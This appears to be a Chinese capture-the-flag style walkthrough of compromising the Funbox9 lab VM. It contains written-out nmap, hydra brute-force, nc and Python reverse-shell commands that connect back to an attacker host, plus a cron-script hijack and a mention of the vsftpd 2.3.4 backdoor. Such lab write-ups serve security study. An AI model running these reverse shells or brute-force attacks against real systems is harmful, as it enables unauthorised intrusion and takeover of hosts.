通过nc获取靶机的反弹Shell [靶机实战]

这篇具有很好参考价值的文章主要介绍了通过nc获取靶机的反弹Shell [靶机实战]。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1、环境

Kali:172.30.1.3/24

靶机(Funbox9):172.30.1.129/24


2、信息收集

通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner

1 nmap -sV -T5 -A 172.30.1.129

通过nc获取靶机的反弹Shell [靶机实战]

 通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录


我们尝试ftp匿名连接此主机:

通过nc获取靶机的反弹Shell [靶机实战]

 根据其返回信息,我们发现了一个可能是一个本地用户的信息:sky用户,可以看到此用户是一个管理员


我们可以尝试对此用户进行ftp密码的爆破,看看能不能获取到其密码(可能无法成功):

1 hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://172.30.1.129

跑了一段时间后,这是最终的结果:

通过nc获取靶机的反弹Shell [靶机实战]

 sky用户的密码为thebest;我们尝试连接:

登录后我们发现,sky并没有被困在 chroot中:

通过nc获取靶机的反弹Shell [靶机实战]

 我们可以以此为突破点,搞一些别的事情,但这里我们试着通过python建立一个反向shell

user.flag 文件 sky用户有着写与执行的权限

通过nc获取靶机的反弹Shell [靶机实战]

 将此文件下载后发现,这是一个脚本文件,再进行推理,很可能是一个由系统周期运行的脚本

所以我们可以重写此脚本,然后上传

通过nc获取靶机的反弹Shell [靶机实战]

 文章来源地址https://www.toymoban.com/news/detail-458916.html


考虑到一般这种系统的安全防护做的很高,所以此时我们直接通过 

nc -nv 172.30.1.3 -e /bin/bash

这种方法可能无法成功建立连接

于是我们使用以下方法来进行连接:

将此命令插入到脚本中,并且上传,这是一个通过python实现的反弹shell,更多方式大家可以去看这个网站:Online - Reverse Shell Generator (revshells.com)

export RHOST="172.30.1.3";export RPORT=25565;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

通过nc获取靶机的反弹Shell [靶机实战]

 

通过nc获取靶机的反弹Shell [靶机实战]

 


 

 

随后,我们在本地监听25565端口,等待连接:

1 nc -lvnp 25565

通过nc获取靶机的反弹Shell [靶机实战]

 


 

靶机成功运行此脚本,证明我们的推理是正确的:

通过nc获取靶机的反弹Shell [靶机实战]

 最终,我们获取了 sarah 的shell

 


 

PS:

从渗透的角度来看,还可以通过 vsftpd 2.3.4 这个版本通过msf直接利用后门漏洞也是可以的

 

到了这里,关于通过nc获取靶机的反弹Shell [靶机实战]的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 反弹shell原理与实现

    反弹shell(Reverse Shell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行

    2024年02月05日
    浏览(30)
  • 059 提权与反弹shell

    在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,对于渗透来说,获得的权限越高,控制的服务器就会越多。 网站首先通过漏洞获取webshell,然后通过shell进行提权。 计算机中的权限: 匿名访问权限 来宾权限 用户权限 管理员权限 系统权限 水平权限提升(越权)

    2024年02月07日
    浏览(30)
  • LINUX shell反弹篇(一)

    在kali机上监听端口: 在 centos上使用: 这条命令我也在网上查了很多资料,总结了一下 bash -i 就是打开一个bash 符号定义: 当后面跟着文件时,就表示为将标准输出和标准错误输出到重定向的文件也就是监听端上。 当后面跟着文件标识符时,就表示将前面的文件描述符重定

    2024年02月15日
    浏览(43)
  • 交互式shell与非交互式shell,反弹shell

    交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输

    2024年02月02日
    浏览(42)
  • 入侵检测——如何实现反弹shell检测?

    反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

    2024年02月13日
    浏览(33)
  • Windows的几种常用反弹shell方法

    简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互

    2024年02月12日
    浏览(31)
  • kali /mac 成功的反弹shell语句

    mac :192.168.19.107 kali:192.168.19.111 kali 监听mac : nc -lvvp 6666 mac执行: 1: mknod backpipe p nc 192.168.19.111 6666 0backpipe | /bin/bash 1backpipe  2: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.19.111 6666 /tmp/f 3: rm -f /tmp/p; mknod /tmp/p p nc 192.168.19.111 6666 0/tmp/p 21 该语句在监听机器上执行的语句会同步

    2024年04月22日
    浏览(26)
  • 漏洞复现 || Hadoop未授权访问反弹Shell漏洞

    技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    浏览(31)
  • 持久化反弹一个能使用方向键的shell

    服务端 被控端 提升到pty 进一步提升可以使用tab,方向键,ctrl+c SEGINT等 服务端 被控端 参考:https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

    2024年02月15日
    浏览(35)
  • 【安全知识】——LInux的shell反弹姿势合集(更新中)

    作者名:白昼安全 主页面链接: 主页传送门 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日鸡汤:  宇宙有宇宙的规律,我也有我的坚持 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况

    2024年02月05日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包